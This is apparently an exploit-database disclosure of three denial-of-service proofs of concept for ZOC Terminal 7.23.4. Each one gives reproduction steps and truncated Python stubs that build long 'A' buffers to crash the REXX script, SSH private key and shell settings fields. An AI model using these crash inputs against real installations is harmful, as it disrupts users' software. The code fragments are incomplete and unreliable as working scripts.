ZOC Terminal version 7.23.4 suffers from multiple denial of service vulnerabilities.
#Exploit Title: ZOC Terminal v7.23.4 - 'Script' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_scr.py and it will create a new file "exp.zrx"
#2.- Open ZOC Terminal
#3.- Select Script > Start REXX Script...
#4.- Select "exp.zrx" file and click "open"
#5.- Crashed
cod = "\x41" * 20000
f = open('exp.zrx', 'w')
#Exploit Title: ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_pkf.py
#2.- Open zoc_pkf.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select File > Create SSH Key Files...
#5.- Select "Private key file:" field erease and Paste ClipBoard
#6.- Click on "Create public/private key files..."
#7.- Crashed
cod = "\x41" * 2000
f = open('zoc_pkf.txt', 'w')
#Exploit Title: ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_sh.py
#2.- Open zoc_sh.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select Options > Program Settings... > Special Files
#5.- Select "Shell" field erease the content and Paste ClipBoard
#6.- Click on "Save"
#7.- Select View > "Command Shell" and select "ok"
#8.- Crashed
cod = "\x41" * 270
f = open('zoc_sh.txt', 'w')